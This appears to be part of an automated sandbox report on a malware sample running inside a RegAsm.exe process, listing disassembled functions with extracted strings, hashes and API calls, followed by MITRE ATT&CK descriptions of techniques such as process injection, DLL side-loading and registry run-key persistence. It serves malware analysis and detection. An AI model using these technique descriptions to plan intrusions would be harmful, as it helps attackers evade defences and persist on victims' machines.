{ze, xrefs: 0041D41F
DE, xrefs: 0041CE3E
'9++, xrefs: 0041D271
kXD], xrefs: 0041D2B8
`c, xrefs: 0041D279
B, xrefs: 0041D280
s}, xrefs: 0041D40F
OMNV, xrefs: 0041D269
T, xrefs: 0041D65C

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: '9++$B$DE$OMNV$T$`c$kXD]$s}${ze
API String ID: 0-2673826114
Opcode ID: d6485e9cf7241666bef504c1f4cd4a340c0a4a6e59ddd74eb0f5fd560a45db70
Instruction ID: 1868728510846028d1a860542af633ffb81ae3236154c8c7a559bfcf2d318afc
Opcode Fuzzy Hash: d6485e9cf7241666bef504c1f4cd4a340c0a4a6e59ddd74eb0f5fd560a45db70
Instruction Fuzzy Hash: 3C829AB450C3408BD314DF29C4906ABFBF2EF96304F148A2DE4D94B392D7799949CB9A

Function 0040D140 Relevance: 11.5, Strings: 9, Instructions: 230COMMON

Download Yara Rule

Strings

p8&B, xrefs: 0040D283
fgK6, xrefs: 0040D26B
-XnS, xrefs: 0040D25B
txZf, xrefs: 0040D2AB
wyEH, xrefs: 0040D28B
r}C}, xrefs: 0040D27B
oRSV, xrefs: 0040D263
}I{@, xrefs: 0040D293
,(^^, xrefs: 0040D253

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,(^^$-XnS$fgK6$oRSV$p8&B$r}C}$txZf$wyEH$}I{@
API String ID: 0-34003872
Opcode ID: 5edc215fc6f1cbd33954a3d6f6557b6057eb2ec007fd91bc2fdd3e3d5a444ffc
Instruction ID: 1760ba8a6586f89acc9ff4844bad97b914076495d0c490b4b8e73cb812b99a5b
Opcode Fuzzy Hash: 5edc215fc6f1cbd33954a3d6f6557b6057eb2ec007fd91bc2fdd3e3d5a444ffc
Instruction Fuzzy Hash: 0B71BA7190D3918BD321CF25C15071BFBE2AFD6740F188A9CE8C42B399C379994A8B97

Function 00423940 Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 554COMMON

Download Yara Rule

Strings

pz, xrefs: 00423CDB
hk, xrefs: 00423FF1
hi, xrefs: 00423E8C

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: hi$hk$pz
API String ID: 0-3399549940
Opcode ID: 96b13404734b356e10eb2a3cd57d83c34cfbb427bd56e4cce950f4618fc84201
Instruction ID: c63e6d813a29f326d5382e897056ca19a02527651d00465734546c966bf36946
Opcode Fuzzy Hash: 96b13404734b356e10eb2a3cd57d83c34cfbb427bd56e4cce950f4618fc84201
Instruction Fuzzy Hash: 241261B420C3408BD304DF19D890A2FBBF1EF9A749F44892DE4D58B361E7799905CB9A

Function 004012F0 Relevance: 7.2, Strings: 5, Instructions: 955COMMON

Download Yara Rule

Strings

0, xrefs: 004024B7
0, xrefs: 00401E51
, xrefs: 004028BD
0, xrefs: 00401EFC
u, xrefs: 00401701

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $0$0$0$u
API String ID: 0-1443305913
Opcode ID: 6a37291dda998b76d907b191f63c5ce9bd4d197d4e3d053f58b566227241360d
Instruction ID: 05fed587303035f026a30b1b0bc6dfed34631ca829513cf6bb969c53b10bd5a6
Opcode Fuzzy Hash: 6a37291dda998b76d907b191f63c5ce9bd4d197d4e3d053f58b566227241360d
Instruction Fuzzy Hash: 3872E371A083428FD718CE28C58436BBBE1ABC5344F148A7EE899A73D1D778DD05CB86

Function 00424A4F Relevance: 6.6, Strings: 5, Instructions: 386COMMON

Download Yara Rule

Strings

ZKB, xrefs: 00424A6B
`a, xrefs: 00424B90
C7HI, xrefs: 00424A90
<KJM, xrefs: 00424A98
U3C5, xrefs: 00424A88

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: <KJM$C7HI$U3C5$ZKB$`a
API String ID: 0-3257718301
Opcode ID: e0b7ff0f1e145cdc980e21cdd4735c70464d5af2b6c368261288f26d84570583
Instruction ID: 078783fb407a359513685ac819476949df50ddb390204825dba4af2698b81af5
Opcode Fuzzy Hash: e0b7ff0f1e145cdc980e21cdd4735c70464d5af2b6c368261288f26d84570583
Instruction Fuzzy Hash: 3AD1CE766193228BC324CF28D49066BB3F2FFD9740F5A891DD4C19B360D734A911CB9A

Function 0042998F Relevance: 6.4, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

\9b7, xrefs: 004298A6
@A, xrefs: 00429886
lM%K, xrefs: 0042986E
Q1:O, xrefs: 00429866
G5M3, xrefs: 0042985E

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: @A$G5M3$Q1:O$\9b7$lM%K
API String ID: 0-4206551269
Opcode ID: 3a94404ebf84c763fdceebfcf06d97121deaef20ebf60ab306f49f506f01d579
Instruction ID: fa93ce66926a69fd0d074796d9a03fcd64deeeb1547ca460ffb012e53c61d8cf
Opcode Fuzzy Hash: 3a94404ebf84c763fdceebfcf06d97121deaef20ebf60ab306f49f506f01d579
Instruction Fuzzy Hash: 675188B8A08301CBD324AF15E86176BB3B1FF86315F04892DE5C58B391E7789944CB9A

Function 0042CD06 Relevance: 6.0, Strings: 4, Instructions: 1034COMMON

Download Yara Rule

Strings

%3"4, xrefs: 0042D081
&@>T, xrefs: 0042D5FF
`d2a, xrefs: 0042D609
DB, xrefs: 0042D8EE

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %3"4$&@>T$DB$`d2a
API String ID: 0-1229532068
Opcode ID: 6a44975174aa817aca96e5bcc5c849175e90dcb8d5636bd1403e04eadd050874
Instruction ID: cf5731bc4947128ccafcddd4ee831c81946913be3d88bdbd9de906a54b6590b7
Opcode Fuzzy Hash: 6a44975174aa817aca96e5bcc5c849175e90dcb8d5636bd1403e04eadd050874
Instruction Fuzzy Hash: CC720474605B518BE329CF35C5A0BA3BBE1AF52304F58886EC4EB87792C739B445CB54

Function 0040EB20 Relevance: 5.4, Strings: 4, Instructions: 445COMMON

Download Yara Rule

Strings

~, xrefs: 0040EFB5
xy, xrefs: 0040ED17
0fcLYSc6YsiKoAYwmJmcMFCKyHhREaq9Ck1_0rmeC58-1726706343-0.0.1.1-/api, xrefs: 0040F067, 0040F084
ur, xrefs: 0040ED94

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0fcLYSc6YsiKoAYwmJmcMFCKyHhREaq9Ck1_0rmeC58-1726706343-0.0.1.1-/api$ur$xy$~
API String ID: 0-2800574684
Opcode ID: ea7201b160cd0657098a7f0c56b7456cb0e25b711acd1aaa75f39bf6ec50852b
Instruction ID: c30f470a461ab34253dba3316a58deefa164bcfc0d16a85addc1ad3f33c85ced
Opcode Fuzzy Hash: ea7201b160cd0657098a7f0c56b7456cb0e25b711acd1aaa75f39bf6ec50852b
Instruction Fuzzy Hash: 4BF17D7150C3809BD314DF19C09062BBBE1AF85718F188D2EE4D9AB392D739D855CB9A

Function 00442380 Relevance: 3.2, Strings: 2, Instructions: 729COMMON

Download Yara Rule

Strings

48fa, xrefs: 00442436
+D, xrefs: 00442AFD

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: +D$48fa
API String ID: 0-2907002838
Opcode ID: 8e161a7ae41766537b49c0da0899be7706f9badc294f3f2ee224f3be7cbfe1ea
Instruction ID: a6f6e3df9747adf83bbcb255246181e1b77575e7f175cc4d3057a558c5ca4e3a
Opcode Fuzzy Hash: 8e161a7ae41766537b49c0da0899be7706f9badc294f3f2ee224f3be7cbfe1ea
Instruction Fuzzy Hash: 3332E135A08211CFC708CF28D99066EB7B2FFCA310F59896DE996A7355C774AC11CB85

Function 004230CB Relevance: 3.1, Strings: 2, Instructions: 624COMMON

Download Yara Rule

Strings

B5B, xrefs: 0042352E
b8B, xrefs: 0042384C

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: B5B$b8B
API String ID: 0-3543309689
Opcode ID: 3c065fc6e3bdfa296d9a08c86b47ff93f5f0559b425a402a2e7c82f86327881f
Instruction ID: 7f34696a69cbdbd58ba5e1ec72fb514504ff55b18b9297ab7bf1df24f33b4ebd
Opcode Fuzzy Hash: 3c065fc6e3bdfa296d9a08c86b47ff93f5f0559b425a402a2e7c82f86327881f
Instruction Fuzzy Hash: 1612AEB5A10216CFDB14CF68DC90BAEB7B2FB49311F1584B9D441E7390D738A960CB64

Function 00422480 Relevance: 3.0, Strings: 2, Instructions: 497COMMON

Download Yara Rule

Strings

@CBM, xrefs: 00422711
4`[b, xrefs: 00422980

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: 4`[b$@CBM
API String ID: 2994545307-914015261
Opcode ID: 2ebc4823115b215dc07172320ed01ffb69c32d281d00f41451b6de92cfcd4569
Instruction ID: 1e7fa92644d3221245016e581dd5124aba216532690e2372444907ad50d10cd9
Opcode Fuzzy Hash: 2ebc4823115b215dc07172320ed01ffb69c32d281d00f41451b6de92cfcd4569
Instruction Fuzzy Hash: 27D12471608210ABC714EF18E991A2BB7F1EF95314F48892DE8C587391E378EC45CB9B

Function 0041A1C0 Relevance: 3.0, Strings: 2, Instructions: 484COMMON

Download Yara Rule

Strings

xO, xrefs: 0041A6BA
4`[b, xrefs: 0041A630

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$xO
API String ID: 0-2409915359
Opcode ID: c600e0d68813c93ab19d01f86f433f4fbdfaf7869400e3bbac417a9335b9f96a
Instruction ID: 1eb7d7872a5630bd2cd4d4ccf23a60d9cfed4132e3154cfad95206f3b418208f
Opcode Fuzzy Hash: c600e0d68813c93ab19d01f86f433f4fbdfaf7869400e3bbac417a9335b9f96a
Instruction Fuzzy Hash: 9CF1CEB81093418BD320DF18C891BEBB7F1EF86358F04092DE5998B291E7399995CB5B

Function 0041FCFF Relevance: 2.9, Strings: 2, Instructions: 386COMMON

Download Yara Rule

Strings

qu, xrefs: 00420101
{}, xrefs: 0041FFDF

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: qu${}
API String ID: 0-3870973077
Opcode ID: 13d33c905abe5fdfe88bc44676e0575ec1e66c5d1a80f9a58b009340d1fde416
Instruction ID: 36c228a042201ca3f74504a380c7f74fb04aafa8671a3818c82b50d58cdae7d3
Opcode Fuzzy Hash: 13d33c905abe5fdfe88bc44676e0575ec1e66c5d1a80f9a58b009340d1fde416
Instruction Fuzzy Hash: F6D1EEF49003268FCB24CF68C8919ABBBB1FF05304B50865DE8559F799D334A952CBE5

Function 004291C0 Relevance: 2.8, Strings: 2, Instructions: 277COMMON

Download Yara Rule

Strings

y, xrefs: 00429423
E|, xrefs: 004294E6

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: E|$y
API String ID: 0-4277912986
Opcode ID: 9ad289c27061fa0034b411e807c400e1fad1d89f2c789d6f3b5af5989cf0fcae
Instruction ID: 41bf107a1d3a659cf908b8af3d8273d51520e3d79f865cd1426e13bbbe70543f
Opcode Fuzzy Hash: 9ad289c27061fa0034b411e807c400e1fad1d89f2c789d6f3b5af5989cf0fcae
Instruction Fuzzy Hash: 66B1347160C3518BD328CF18D59075FBBE2BFC5B08F51491DE8A967391CB34A909CB96

Function 00440554 Relevance: 2.6, Strings: 2, Instructions: 125COMMON

Download Yara Rule

Strings

4`[b, xrefs: 004405E0
4`[b, xrefs: 00440520

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b
API String ID: 0-3640500014
Opcode ID: 324f4ce704391dc073c259c0127bf1b2f80a669b6253a9d4e8c63fb132018a77
Instruction ID: ee312bf5b11964c7ff15c865c2c41727b9c96ea90af7520683eed7cd0e746981
Opcode Fuzzy Hash: 324f4ce704391dc073c259c0127bf1b2f80a669b6253a9d4e8c63fb132018a77
Instruction Fuzzy Hash: AE419E7AE0021A9BEB1CCF54C8A097FB772EF89311F68512DC65263354C734A912CB98

Function 00422200 Relevance: 1.8, APIs: 1, Instructions: 257comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00446BA0,00000000,00000001,00446B90), ref: 00422229

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 3aa8418b0923ccbd293088b625bd7d728ee8bfe2ebadadb27b1b5412abdd6912
Instruction ID: 8a786117b9e43f5532cdcb2852cc0da08dc30fb2eee3a0e287dcb039167bfdb5
Opcode Fuzzy Hash: 3aa8418b0923ccbd293088b625bd7d728ee8bfe2ebadadb27b1b5412abdd6912
Instruction Fuzzy Hash: B761F0B0700220ABDB20DF64DC81BA733A4EF85358F444959F985CB291E7B9E905C76A

Function 0041AAC0 Relevance: 1.7, APIs: 1, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5cbc82da96d50e888af9d58b0fb6c5f90bd0680ea9041f8473db7d467220486
Instruction ID: bf589624a2ae1b213b56f1e6ad2a858535183977c63a0335c3ce7d62009b7ec9
Opcode Fuzzy Hash: e5cbc82da96d50e888af9d58b0fb6c5f90bd0680ea9041f8473db7d467220486
Instruction Fuzzy Hash: 6F61BC75509351CBC720CF28C8906ABB7F1FF8A324F054A6CE8A99B391D735A855CB86

Function 00441D50 Relevance: 1.6, Strings: 1, Instructions: 347COMMON

Download Yara Rule

Strings

R D, xrefs: 00442049

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: R D
API String ID: 0-1951171303
Opcode ID: c13e36dcda85c97c3403a5e359612dcc22d1585d48ec997ce95f86d4ce8543bc
Instruction ID: c132d68b5a0223537255d2c93b29c4c31bb7317b59522cf994ab02c5a4ca6c26
Opcode Fuzzy Hash: c13e36dcda85c97c3403a5e359612dcc22d1585d48ec997ce95f86d4ce8543bc
Instruction Fuzzy Hash: A7D1DB7AA08216CFDB04CF68D8906AEB7F1FF8A300F1948A9E955E7351D334E841CB95

Function 00422D6A Relevance: 1.6, Strings: 1, Instructions: 315COMMON

Download Yara Rule

Strings

b8B, xrefs: 0042384C

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: b8B
API String ID: 0-996104731
Opcode ID: d93b481e8d13222b2001c1d34a01cd14759110b1f26d42166cc91492b8fb0a3c
Instruction ID: 75d8e0124c7f8f246690d66473b33735dba6223ce8177b27621650f4e9af5c27
Opcode Fuzzy Hash: d93b481e8d13222b2001c1d34a01cd14759110b1f26d42166cc91492b8fb0a3c
Instruction Fuzzy Hash: 82A1D271E00269CBDB24CFA8D890BAEBBB1FB45304F648469D855EB381D7389946CF54

Function 00426230 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d43af2e3d8e0da42577eb0ed57251ddc4e1a5d7c7798d1be1c0247532a141da
Instruction ID: 6fd84e8497d43531e2304d8df3ec867afee4a9033a87c56c4ccee3dca3ac1a9b
Opcode Fuzzy Hash: 8d43af2e3d8e0da42577eb0ed57251ddc4e1a5d7c7798d1be1c0247532a141da
Instruction Fuzzy Hash: 9081BCB46083508BC314EF14D89162BBBF1EF95354F548A1DF4C68B361E739D948CB9A

Function 00412001 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b82c848d8087dfdc63c6f77abf67a99d2fd0904271510991cef778cef07fa876
Instruction ID: d5708df4a173f39f4d0d50ed2b66a9801a4642de10f48f0da976f21ca0158568
Opcode Fuzzy Hash: b82c848d8087dfdc63c6f77abf67a99d2fd0904271510991cef778cef07fa876
Instruction Fuzzy Hash: 2171C0B56183828BD314DF24E991B9FB7E6EBC6304F04482DE485D7291D739D819CB27

Function 0043CC30 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af2dff141c025f0df082f570e7fdf843cf5d33f05dc5e06fffc36465af55dcb7
Instruction ID: f60b3c101f590a180beb5299fbf9903165c2a754cadf1e0045d3e8fdacded8ad
Opcode Fuzzy Hash: af2dff141c025f0df082f570e7fdf843cf5d33f05dc5e06fffc36465af55dcb7
Instruction Fuzzy Hash: 9F61D3326083509BD710DF1CC88065BFBE6EF9A750F19982EE8D4A7351D338EC058B8A

Function 00428B4F Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa02b0874c49a53f4b27958129ba2d00a32e8ab31c725074a95e27c2fce87e0d
Instruction ID: 11f4065767c35169ad332f05da1a0040881e15f797dbad5e466c3ed708ba45db
Opcode Fuzzy Hash: aa02b0874c49a53f4b27958129ba2d00a32e8ab31c725074a95e27c2fce87e0d
Instruction Fuzzy Hash: 032165B4609390DBC310AF58E89061FBBF0EB86304F40192DF9C48B311D73AE901DB5A

Function 004193C0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7ebfe7c9b2f055f3c23c326fc3b2ad9be9a42fa70a070a38dfb9b7e5e8440bc
Instruction ID: 1e2c6b039f30f8adac7e34a259fd7c23d16ba38d881dbba37e6c1aa59a41101c
Opcode Fuzzy Hash: a7ebfe7c9b2f055f3c23c326fc3b2ad9be9a42fa70a070a38dfb9b7e5e8440bc
Instruction Fuzzy Hash: 02F0A7B160821067DB2289559CD1FB7FB9CCB9B354F190416F84657242D1655C86C3E9

Function 00431B6A Relevance: 54.4, APIs: 1, Strings: 30, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00431C28

Strings

%, xrefs: 00431B81
V, xrefs: 00431D63
t, xrefs: 00431CD7
l, xrefs: 00431D45
_, xrefs: 00431CB9
f, xrefs: 00431D27
A, xrefs: 00431CFF
Y, xrefs: 00431D13
E, xrefs: 00431D1D
P, xrefs: 00431C9B
A, xrefs: 00431C4B
_, xrefs: 00431CAF
0, xrefs: 00431E16
i, xrefs: 00431D59
E, xrefs: 00431CEB
E, xrefs: 00431D4F
F, xrefs: 00431C73
D, xrefs: 00431C55
J, xrefs: 00431D09
', xrefs: 00431CCD
9, xrefs: 00431C69
\, xrefs: 00431B91
(, xrefs: 00431C87
r, xrefs: 00431CF5
[, xrefs: 00431D3B
B, xrefs: 00431D31
^, xrefs: 00431CA5
E, xrefs: 00431C5F
p, xrefs: 00431CE1
%, xrefs: 00431B71

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID: %$%$'$($0$9$A$A$B$D$E$E$E$E$F$J$P$V$Y$[$\$^$_$_$f$i$l$p$r$t
API String ID: 2525500382-3365854356
Opcode ID: c8337dadd65c24ccea2c6517a3179070cc86af82411a4ada3d26bd2274528dcb
Instruction ID: 80a9a654dbb36320bb081740a2fb1142bb867c88bcfd281929460cb82615554e
Opcode Fuzzy Hash: c8337dadd65c24ccea2c6517a3179070cc86af82411a4ada3d26bd2274528dcb
Instruction Fuzzy Hash: 8481836000C7C18AD322DB3C958874FBFD15BA7328F484B9DE1E94A2D2D3B98545CB67

Function 004301B2 Relevance: 26.3, APIs: 2, Strings: 13, Instructions: 86COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 004301C4
VariantInit.OLEAUT32 ref: 004301D7

Strings

P, xrefs: 00430221
F, xrefs: 00430203
%, xrefs: 00430267
, xrefs: 00430271
q, xrefs: 004301EF
#, xrefs: 00430253
+, xrefs: 0043023F
), xrefs: 00430249
_, xrefs: 00430217
+, xrefs: 0043027B
L, xrefs: 0043022B
A, xrefs: 004301F9
H, xrefs: 0043020D

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: Variant$ClearInit
String ID: $#$%$)$+$+$A$F$H$L$P$_$q
API String ID: 2610073882-4140598507
Opcode ID: f030e5827cac92a22c48e73f53dd005b977f65561848590c70e951ad37413741
Instruction ID: 5413ef672320ba6b0f552510c75784fa4577eae45b7d4e12623aeea4fad6af0e
Opcode Fuzzy Hash: f030e5827cac92a22c48e73f53dd005b977f65561848590c70e951ad37413741
Instruction Fuzzy Hash: 3F41C47000C7C19ED362DB79948864ABFE06BA6228F481E9DF5E44B3E2C3758549CB57

Function 0042FA4A Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 69COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0042FA5B

Strings

T, xrefs: 0042FA96
c, xrefs: 0042FA86
R, xrefs: 0042FAA6
b, xrefs: 0042FAD6
a, xrefs: 0042FAB6
e, xrefs: 0042FAC6

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: InitVariant
String ID: R$T$a$b$c$e
API String ID: 1927566239-2761824072
Opcode ID: 2ea6a98bd8385a1b55f699f051052a67a763331df89bf415ea3e332855f35321
Instruction ID: 8b0c16e3f8a72f30f0e8be228a7ccebef4b3bd2d4ffc797d701966bd87190d59
Opcode Fuzzy Hash: 2ea6a98bd8385a1b55f699f051052a67a763331df89bf415ea3e332855f35321
Instruction Fuzzy Hash: 6F41FE3010C7C18AD332DB68D49479FBBE0AB92314F044E6EE0E99B382C7759648CB63

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

